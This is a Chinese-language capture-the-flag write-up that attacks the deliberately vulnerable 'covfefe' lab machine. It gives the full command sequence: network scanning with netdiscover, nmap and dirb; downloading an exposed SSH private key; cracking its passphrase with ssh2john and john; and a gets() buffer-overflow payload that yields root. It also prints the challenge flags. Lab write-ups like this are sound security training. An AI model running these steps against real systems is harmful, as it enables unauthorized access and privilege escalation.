ctf-wp-ssh私钥泄露

下载靶机之后进不去，这时候需要知道靶机的ip地址，kali里面使用netdiscover工具，查找局域网内的主机。
命令：

netdiscover

结果：

 Currently scanning: 172.16.96.0/16   |   Screen View: Unique Hosts                                                                            
                                                                                                                                               
 6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360                                                                               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.189.128 00:0c:29:bb:be:f8      2     120  VMware, Inc.                                                                                
 192.168.189.2   00:50:56:e1:b2:05      2     120  VMware, Inc.                                                                                
 192.168.189.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                                                
 192.168.189.254 00:50:56:f7:43:0f      1      60  VMware, Inc.   

查看靶机对应mac地址，得知靶机IP为192.168.189.128
直接nmap扫描，命令：

nmap -sV 192.168.189.128

结果：

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-19 14:02 CST
Nmap scan report for 192.168.189.128
Host is up (0.000088s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 00:0C:29:BB:BE:F8 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

服务器开启了22、80、31337端口，后两个是http服务分别在浏览器查看
80端口：

31337端口：

直接dirb进行扫描，80端口没有结果，31337发现几个敏感目录：

root@Zkali:~# dirb http://192.168.189.128:31337

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Mar 19 14:05:56 2019
URL_BASE: http://192.168.189.128:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4615                                                          

---- Scanning URL: http://192.168.189.128:31337/ ----
+ http://192.168.189.128:31337/.bash_history (CODE:200|SIZE:81)                                                                                
+ http://192.168.189.128:31337/.bashrc (CODE:200|SIZE:3526)                                                                                    
+ http://192.168.189.128:31337/.profile (CODE:200|SIZE:675)                                                                                    
+ http://192.168.189.128:31337/.ssh (CODE:200|SIZE:43)                                                                                         
+ http://192.168.189.128:31337/robots.txt (CODE:200|SIZE:70)                                                                                   
                                                                                                                                               
-----------------
END_TIME: Tue Mar 19 14:06:09 2019
DOWNLOADED: 4615 - FOUND: 5

其中一眼看上去有价值的：.ssh robots.txt
先看.ssh

有一行提示。
再来看robots.txt

发现三个目录，逐个查看：
前两个分别都有一个文件，下载。第三个目录 ：

找到了一个flag。
考虑.ssh目录的提示，看看是否有公钥私钥文件。


下载到两个文件
通过ssh私钥文件来登录服务器：
查看私钥文件权限：ls -alh

查看authorized_keys文件内容

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe

看到用户名simon
使用此用户名来登录：
ssh -i id_rsa simon@192.168.189.128

root@Zkali:~# ssh -i id_rsa simon@192.168.189.128
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
simon@192.168.189.128: Permission denied (publickey).

提示私钥文件权限问题，重新对私钥文件进行赋权限：
chmod 600 id_rsa 查看id_rsa的权限

继续登录：提示输入密码

考虑从id_rsa文件中破解出密码：
首先使用ssh2john工具将id_rsa转换成john可识别的文件类型,输出到crack文件中
命令：

ssh2john id_rsa > crack

现在要破解crack中的密码

zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules crack

解密出来的密码为starwars
登录成功。

simon@covfefe:~$ pwd
/home/simon
simon@covfefe:~$ cd /root
simon@covfefe:/root$ ls
flag.txt  read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied

没有权限查看flag.txt

现在看看read_message.c

cat read_message.c

结果：

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }

}

注释中找到第二个flag
进行代码审计，发现存在缓冲区溢出，判断前五个字符是否为Simon尝试缓冲区溢出提权：
运行read_message.c

构造payload：

simon111111111111111/bin/sh

找到第三个flag。